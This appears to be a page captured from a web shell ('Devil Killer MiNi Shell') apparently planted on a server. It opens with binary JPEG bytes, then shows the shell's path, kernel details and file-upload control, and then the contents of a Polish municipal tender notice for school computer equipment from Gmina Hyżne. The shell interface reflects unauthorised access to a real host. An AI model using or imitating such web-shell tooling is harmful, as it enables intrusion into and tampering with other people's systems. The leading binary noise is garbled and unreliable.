JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241122/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241122/0061195201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój edukacji na terenie gminy Hyżne” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA HYŻNE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582080</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hyżne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-024</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 23 045 60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">17 22 950 01</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gzeas@hyzne.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">pzp.hyzne.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gminny Zespół Ekonomiczno-Administracyjny Szkół w Hyżnem</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">813-33-03-324</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Hyżne 103</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Hyżne</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">36-024</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">(17) 22 95 005</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">gzeas@hyzne.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.gzeashyzne.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój edukacji na terenie gminy Hyżne” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8d6ad828-00e1-4ab1-9886-4e4f803ef428</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00611952</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00052302/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój edukacji na terenie gminy Hyżne”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Rozwój edukacji na terenie gminy Hyżne” FEPK.07.12-IP.01-0016/23 Projekt współfiansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021-2027. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ZETOPZP: https://pzp.hyzne.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">gzeas@hyzne.pl (nie dotyczy procesu składania ofert)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowo opisane w VIII SWZ <br/>1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się elektronicznie przy użyciu:<br/>1)	Platformy Zamówień Publicznych ZETOPZP: https://pzp.hyzne.pl/<br/>2)	poczty elektronicznej:<br/>	adres e-mail Zamawiającego: gzeas@hyzne.pl<br/>2.	We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się nadanym przez Zamawiającego numerem sprawy: GZEAS.261.2.2024 lub numerem ogłoszenia (TED) lub identyfikatorem postępowania wygenerowanym przez ZETOPZP: https://pzp.hyzne.pl/<br/>3.	Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: <br/>1)	w zakresie procedury udzielenia zamówienia: <br/>	Joanna Groszek tel. 535 953907<br/>4.	Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta w Platformie Zamówień Publicznych ZETOPZP, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie internetowej https://pzp.hyzne.pl/ oraz uznaje go za wiążący.<br/>5.	Ogólne zasady korzystania z Platformy:<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://pzp.hyzne.pl/#/authentication/login;<br/>2) Wykonawca aby przystąpić do postępowania musi założyć konto na Platformie https://pzp.hyzne.pl/#/authentication/login gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny a następnie ustanawia hasło;<br/>3) Proces rejestracji Wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy podać dane firmy, którą osoba zakładająca konto reprezentuje.<br/>4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy i powiadomień mailowych.<br/>5) Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 27 czerwca 2017 r. (Dz. U. z 2020r. poz. 1261) w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania dokumentów elektronicznych (dalej jako &#34;Rozporządzenie&#34;) określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.: <br/>6) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>7) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>8) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>9) Włączona obsługa JavaScript;<br/>10) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.;<br/>11) Podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę.<br/>12) Zamawiający, zgodnie z § 3 ust. 3 powołanego powyżej Rozporządzenia określa:<br/>13) dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB <br/>w formatach: .doc, .pdf, .zip.;<br/>14) informacje na temat kodowania i czasu odbioru danych: - plik załączony przez Wykonawcę na Platformie Zamówień Publicznych ZETOPZP i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>15) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu platformy ZETOPZP, który jest synchronizowany ze znacznikiem czasu UTC.<br/>16) Wykonawca powinien dokładnie zapoznać się z niniejszą SWZ i złożyć ofertę zgodnie z jej wymaganiami.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Zamawiający informuję, że dane osobowe pozyskane w związku <br/>z przeprowadzeniem niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej &#34;Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia publicznego <br/>2)	Administratorem danych osobowych jest Zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych wydane na jej podstawie akty wykonawcze, a także ustawa <br/>o narodowym zasobie archiwalnym i archiwach. <br/>3)	Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu: <br/>a)	przeprowadzenie postępowania o udzielenie zamówienia publicznego, <br/>b)	zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu <br/>Wykonawcą, <br/>c)	dokonania rozliczenia i płatności związanych z realizacją umowy, <br/>d)	przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki Zamawiającego i inne uprawnione podmioty, <br/>e)	udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej, <br/>f)	archiwizacji postępowania. <br/>4)	Dane osobowe będą ujawniane Wykonawcom oraz wszystkim zainteresowanym. <br/>5)	Dane osobowe będą przechowywane przez okres obowiązywania umowy <br/>a następnie przez okres co najmniej 5 lat zgodnie z przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania. <br/>6)	Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO: <br/>a)	prawo dostępu do danych (art. 15), <br/>b)	prawo sprostowania danych (art. 16), <br/>c)	prawo do usunięcia danych (art. 17), <br/>d)	prawo do ograniczenia przetwarzania danych (art. 18), <br/>e)	prawo wniesienia skargi do organu nadzorczego. <br/>7)	Osobie, której dane dotyczą nie przysługuje: <br/>a)	prawo do usunięcia danych osobowych, &#34;prawo do bycia zapomnianym&#34; <br/>w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia RODO, <br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 <br/>Rozporządzenia RODO, <br/>c)	prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO.<br/>8)	Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności Wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem Wykonawcy z postępowania lub odrzuceniem jego oferty. <br/>9)	Wystąpienie z żądaniem, o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub umowy. <br/>10)	Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany jest wypełnić obowiązki wynikające m. in. z art 13 i 14 Rozporządzenia RODO. <br/>Wykonawca składając ofertę składa oświadczenie dotyczące przetwarzania danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GZEAS.261.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 Zakup i dostawa sprzętu komputerowego wraz z oprogramowaniem, urządzeń drukujących oraz pozostałych urządzeń elektronicznych.<br/><br/> Przedmiotem zamówienia jest Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój edukacji na terenie gminy Hyżne” FEPK.07.12-IP.01-0016/23 Projekt współfiansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021-2027.<br/>3. Zakres dostawy, wymagań Zamawiającego oraz czynności do wykonania przez<br/>Wykonawcę został określony w załączniku do SWZ 3 a, <br/>4.	Miejsce dostawy:<br/>- Szkoła Podstawowa im. Tadeusza Gajcego w Szklarach, Szklary 148, 36-025 Dylągówka<br/>- Szkoła Podstawowa i. Polskiego Czerwonego Krzyża w Dylągówce, Dylągówka 29, 36-024 Dylągówka<br/>- Szkoła Podstawowa im. Gen. Władysława Sikorskiego w Hyżnem, Hyżne 615 A, 36-024 Hyżne<br/>- Szkoła Podstawowa im. 21 Brygady Strzelców Podhalańskich w Brzezówce, Brzezówka 111, 36-024 Hyżne<br/>- Szkoła Podstawowa im. Św. Jana Kantego w Grzegorzówce, Grzegorzówka 173, 36-025 Dylągówka<br/>5. Dostarczone przedmioty zamówienia muszą być fabrycznie nowe, z bieżącej produkcji, wolne od wad, zapakowane w opakowania umożliwiające jednoznaczną identyfikację zapakowanego produktu.<br/>6. Zaleca się, aby dostarczony asortyment zapakowany był w tekturowych pudełkach, uniemożliwiających uszkodzenie produktów w czasie transportu, zabezpieczony fabrycznie.<br/>6.Odpowiedzialność za uszkodzenia produktów w czasie transportu ponosi Wykonawca.<br/>7. Wszelkie koszty związane z wykonaniem zamówienia ponosi Wykonawca.<br/>8. Zamawiający zastrzega sobie możliwość zwrotu dostarczonego asortymentu<br/>niespełniającego wymogów jakościowych oczekiwanych przez Zamawiającego na koszt Wykonawcy.<br/>9. Przedmiot dostawy musi spełnić wymogi określone obowiązującym prawem, zostać dopuszczony do obrotu handlowego i posiadać wymagane prawem ważne dokumenty, stwierdzające dopuszczenie do stosowania na terenie Polski.<br/>10. Wykonawca przy realizacji zamówienia zobowiązany jest do zachowania dbałości o środowisko naturalne, poprzez m.in. eliminowanie z użycia przedmiotów jednorazowego użytku wykonanych z tworzyw sztucznych, rezygnacji z używania jednorazowych opakowań, toreb, siatek i reklamówek wykonanych z poliolefinowych<br/>tworzyw sztucznych.<br/>11. Wykonawca zobowiązany jest do wykorzystywania przy wykonaniu umowy materiałów, które pochodzą z recyklingu lub podlegają procesowi recyklingu.<br/>12. Minimalny okres gwarancji jakości: 24 miesiące od daty podpisania bezusterkowego protokołu odbioru.<br/>13. Wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia zostały określone w załącznikach nr 3 a, 3b, 3 c do SWZ – Kalkulacja cenowa - Opis przedmiotu zamówienia.<br/>14. Charakter przedmiotu zamówienia nie uzasadnia określania wymagań, o których mowa w art. 100 ust 1 ustawy Prawo zamówień publicznych.<br/>15. Zamówienie zostało podzielone na 3 części. Zamawiający dopuszcza możliwość składania ofert na każdą część oddzielnie lub na wszystkie razem, nie wprowadza się ograniczeń w tym zakresie.<br/>16.Rozwiązania równoważne <br/>Zgodnie z art. 101 ust. 4 Pzp w sytuacji, gdyby w dokumentach opisujących przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, ocenie technicznej, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”. <br/>Zgodnie z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywane w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>W każdym przypadku w odniesieniu do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania równoważne.<br/><br/> 17. Szczegółowy opis przedmiotu zamówienia określa: <br/>a.	Załącznik nr 3 a, „ Kalkulacja ceny – Opis przedmiotu zamówienia dla każdej części”<br/>b. Projektowane postanowienia umowy w sprawie zamówienia publicznego zawierające cały opis przedmiotu zamówienia wraz z załącznikami i <br/><br/>Załącznik Nr 1 – Kalkulacja ceny - Opis przedmiotu zamówienia.<br/>Załącznik Nr 2 – Oferta Wykonawcy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30231320-6 - Monitory dotykowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32322000-6 - Urządzenia multimedialne</p> <p class="mb-0">33195100-4 - Monitory</p> <p class="mb-0">30232110-8 - Drukarki laserowe</p> <p class="mb-0">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</p> <p class="mb-0">42962000-7 - Urządzenia drukujące i graficzne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla części nr 1 <br/>Zakup i dostawa sprzętu komputerowego wraz z oprogramowaniem, urządzeń drukujących oraz pozostałych urządzeń elektronicznych.<br/><br/>1.	Zamawiający będzie oceniał oferty według następujących kryteriów: <br/>Nr	Nazwa kryterium	Waga<br/>1	Cena	60<br/>2	Okres gwarancji jakości	30<br/>3	Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	10<br/>Razem	100<br/>2.	Punkty przyznawane będą liczone według następujących wzorów: <br/>Nr i nazwa kryterium	Wzór<br/>1 Cena	Liczba punktów = (Cmin/Co) *waga<br/>gdzie: <br/>Cmin - najniższa cena spośród wszystkich ofert <br/>Co - cena podana w badanej ofercie <br/>2.Okres gwarancji jakości<br/><br/>Dotyczy pozycji od nr 1 do 23 z załącznika nr 3 a do SWZ	1. Kryterium – „Okres gwarancji jakości”– poszczególnym ofertom zostaną przyznane punkty w oparciu o zadeklarowaną wartość oferowanego okresu gwarancji jakości na zrealizowane dostawy. <br/>I I Im dłuższy termin gwarancji jakości, tym większa liczba przyznanych punktów. Przy czym minimalny wymagany okres gwarancji jakości wynosi 24 miesiące. <br/>2. W przypadku nie uzupełnienia pola – okres gwarancji jakości– Zamawiający domyślnie ustala minimalny wymagany okres jako 24 miesiące. <br/>3. W przypadku wskazania okresu gwarancji jakości niższego niż minimalny wymagany okres tj. 24 miesiące – oferta będzie podlegać odrzuceniu, jako niezgodna z treścią SWZ (art. 226 ust 1 pkt 5) <br/>4. W przypadku wskazania okresu gwarancji jakości wyższego niż 36 miesięcy – oferta uzyska maksymalną ilość punktów w danym kryterium tj. 30pkt. <br/><br/>5. Punktacja: <br/>- okres 24 m-cy – 0 pkt <br/>- okres 30 m-cy – 15 pkt <br/>- okres 36 m-cy – 30 pkt <br/>6. Maksymalnie w danym kryterium można otrzymać 30 pkt. <br/>3. Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	1.	W ramach tego kryterium Wykonawcy ubiegający się o zamówienie publiczne 